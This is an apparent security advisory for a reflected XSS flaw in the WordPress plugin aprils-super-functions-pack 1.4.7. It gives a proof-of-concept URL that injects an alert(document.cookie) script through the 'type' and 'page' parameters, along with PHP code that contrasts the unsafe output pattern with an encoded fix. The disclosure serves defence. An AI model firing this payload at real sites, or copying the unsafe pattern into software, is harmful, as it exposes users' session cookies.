wp-plugin : aprils-super-functions-pack

Plugin Details
Plugin Name: wp-plugin : aprils-super-functions-pack
Affected Version : 1.4.7 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
 http://localhost/wp-content/plugins/aprils-super-functions-pack/readme.php?type=type"><script>alert(document.cookie)</script>&page=page"><script>alert(document.cookie)</script>&

Vulnerable Parameter : page, type

Type of XSS : Reflected

Fixed in : 1.4.8

Trac Changelog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=833934%40aprils-super-functions-pack&old=742940%40aprils-super-functions-pack&sfp_email=&sfph_mail=
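As an added illustration (not code from the plugin, the changeset linked above, or the advisory's author), the PHP below shows the class of defect described in this advisory: the `type` and `page` query values being written into an HTML attribute without encoding, placed next to a hardened form that encodes for the attribute context and, where the value set is known, restricts it to an allow-list. The function names, the allow-list values and the sample input are assumptions made for the example; they do not reproduce the plugin's actual readme.php.

```php
<?php
// Added illustration only: a hypothetical reflected-XSS pattern of the kind
// described in the advisory (parameters 'type' and 'page'), beside its fix.

// --- Vulnerable pattern (hypothetical): untrusted GET values are concatenated
// into an HTML attribute. A value such as  type"><script>...</script>  closes
// the attribute and the surrounding tag, so the payload lands as live markup.
function render_link_unsafe(array $get): string {
    $type = $get['type'] ?? '';
    $page = $get['page'] ?? '';
    return '<a href="readme.php?type=' . $type . '&page=' . $page . '">Readme</a>';
}

// --- Hardened form: build the query with http_build_query() (percent-encodes
// reserved characters) and encode the result for the attribute context with
// htmlspecialchars(ENT_QUOTES), so neither " nor ' can terminate the attribute.
// Inside WordPress the idiomatic equivalents are esc_url() / esc_attr().
function render_link_safe(array $get): string {
    $type = $get['type'] ?? '';
    $page = $get['page'] ?? '';
    $url  = 'readme.php?' . http_build_query(['type' => $type, 'page' => $page]);
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">Readme</a>';
}

// --- Tighter still: when the parameter selects from a fixed set, accept only
// known values and fall back to a default. The list below is a made-up example,
// not the plugin's real set of section names.
function normalize_type(string $type, array $allowed = ['shortcodes', 'functions', 'widgets']): string {
    return in_array($type, $allowed, true) ? $type : $allowed[0];
}

// Constructed input mirroring the shape of the advisory's PoC (no live request).
$probe = [
    'type' => 'type"><script>alert(1)</script>',
    'page' => 'page"><script>alert(1)</script>',
];

echo render_link_unsafe($probe), PHP_EOL; // attribute is broken; the script tag is rendered
echo render_link_safe($probe), PHP_EOL;   // the same bytes appear as inert, encoded text
echo normalize_type($probe['type']), PHP_EOL; // unknown value collapses to the default
```

The two encoding steps are deliberate: percent-encoding alone does not protect an HTML attribute if the value is later decoded, and HTML-encoding alone does not produce a well-formed URL. Applying the encoder that matches each output context is what makes the reflected value harmless regardless of what the client submits.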


Disclosure Timeline
Vendor Contacted : 2014-01-04
Plugin Status : Updated on 2014-01-06
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
This plugin contains a large number of shortcodes that make it easy to lay out text on your site in more exciting ways than simply paragraphs, headers, and lists. There are also some template functions and useful javascript that theme developers may find useful.
Shortcodes:
* Columns - 2, 3, or 4
* Boxes with particular color, height, title
* Tabs (js-driven)
* Expand/Hide (js-driven)
* Buttons and icons
* Pull-quotes
* Dropcaps
* ... and more
Other Functions:
* Template function for displaying pages 'in the current section'
* Template function for displaying the image that belongs to a post
* JS to remove 'title' tags from WP-generated menus
* JS to allow pre-selecting a recipient from certain CForms forms
* JS to make suckerfish menus work in IE
Widgets:
* A replacement Text widget that lets you specify a class